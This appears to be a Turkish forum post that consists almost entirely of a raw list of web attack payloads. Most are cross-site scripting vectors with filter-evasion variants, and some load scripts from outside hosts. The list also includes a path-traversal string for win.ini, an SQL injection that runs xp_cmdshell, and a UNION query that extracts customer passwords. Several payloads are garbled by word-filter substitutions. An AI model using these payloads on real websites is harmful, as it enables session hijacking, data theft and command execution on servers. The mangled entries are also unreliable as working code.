Kod:
"><script>alert(document.cookie)</script>
"><script>alert(1)</script>
’);alert(’own’);//
"><script/src=http://site.com/xss.js></script>
><script>alert(’XSS Vulnerable’)</script><b a=a
’<script>alert(’XSS’)</script>
’><script>alert(’XSS’)</script>
"><script>alert(’XSS’)</script>
"><script>alert(’XSS’)</script>
javascript;alert(‘XSS’)
<title>XSS</title>
"><script>alert(’xss’);</script>+
"><script>alert(’X’);</script>"><script>alert(’X’);</script> == X
">’<’script’>alert(’xss’)</’script>
’><script>alert(document.cookie)</script>
=’><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<script>alert(’XSS’)</script>
<script>alert(’XSS’)</script>
<img src= "javascript*alert ZararliKod*’XSS’)">
%0a%0a<script>alert(\\"Vulnerable\\")</script>.jsp
“%3cscript%3ealert(“xss“)%3c/script%3e
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(“xss“)%3c/script%3e
%3c/title%3e%3cscript%3ealert(“xss“)%3c/script%3e
%3cscript%3ealert(“xss“)%3c/script%3e/index.html
<script>alert(’Vulnerable’);</script>
<script>alert(’Vulnerable’)</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert(’Vulnerable’)</script>
a?<script>alert(’Vulnerable’)</script>
"><script>alert(’Vulnerable’)</script>
’;exec%20master..xp_cmdshell%20’dir%20 c:%20>%20c:\\inetpub\\wwwroot\\?.txt’--&&
“><script>alert(document.cookie)</script>
<script>alert(document. domain);</script>&
<script>alert(document.domain);</script>&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
’’;!--"<XSS>=&{()}
<IMG src= "javascript*alert ZararliKod*’XSS’);">
<IMG SRC=javascript*alert ZararliKod*’XSS’)>
<IMG SRC=JaVaScript*alert ZararliKod*’XSS’)>
<IMG SRC=JaVaScript*alert ZararliKod*"XSS")>
<IMG src= "jav ascript*alert ZararliKod*’XSS’);">
<IMG src= "ZararliKodscript*alert ZararliKod*’XSS’);">
<IMG src= "jav
ascript*alert ZararliKod*’XSS’);">
"<IMG SRC=java\\0script*alert ZararliKod*\\"XSS\\")>";’ > out
<IMG src= " javascript*alert ZararliKod*’XSS’);">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript*alert ZararliKod*’XSS’)">
<BODY ONLOAD=alert(’XSS’)>
<IMG DYNsrc= "javascript*alert ZararliKod*’XSS’)">
<IMG LOWsrc= "javascript*alert ZararliKod*’XSS’)">
<BGSOUND src= "javascript*alert ZararliKod*’XSS’);">
<br size="&{alert(’XSS’)}">
<LAYER src= "http://xss.ha.ckers.org/a.js"></layer>
<LINK REL="stylesheet" href= "javascript*alert ZararliKod*’XSS’);">
<IMG Yasak Kelime#146;vbscript:msgbox("XSS")’>
<IMG src= "mocha:[code]">
<IMG src= "livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript*alert ZararliKod*’XSS’);">
<IFRAME SRC=javascript*alert ZararliKod*’XSS’)></IFRAME>
<FRAMESET><FRAME SRC=javascript*alert ZararliKod*’XSS’)></FRAME></FRAMESET>
<TABLE BACKGROUND="javascript*alert ZararliKod*’XSS’)">
<DIV STYLE="background-image: url(javascript*alert ZararliKod*’XSS’))">
<DIV STYLE="behaviour: url(’xss’);">
<DIV STYLE="width: expression(alert(’XSS’));">
<STYLE>@im\\port’\\ja\\vasc\\ript*alert ZararliKod*"XSS")’;</STYLE>
<IMG STYLE=’xss:expre\\ssion(alert("XSS"))’>
<STYLE TYPE="text/javascript">alert(’XSS’);</STYLE>
<STYLE TYPE="text/css">.XSS{background-image:url("javascript*alert ZararliKod*’XSS’)");}</STYLE><A CLASS=XSS></A>
<BASE href= "javascript*alert ZararliKod*’XSS’);//">
getURL("javascript*alert ZararliKod*’XSS’)")
"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert(’XSS’);}</SCRIPT><"
<SCRIPT src= "http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<IMG src= "javascript*alert ZararliKod*’XSS’)"
Hıde niye yapmadın merak ettim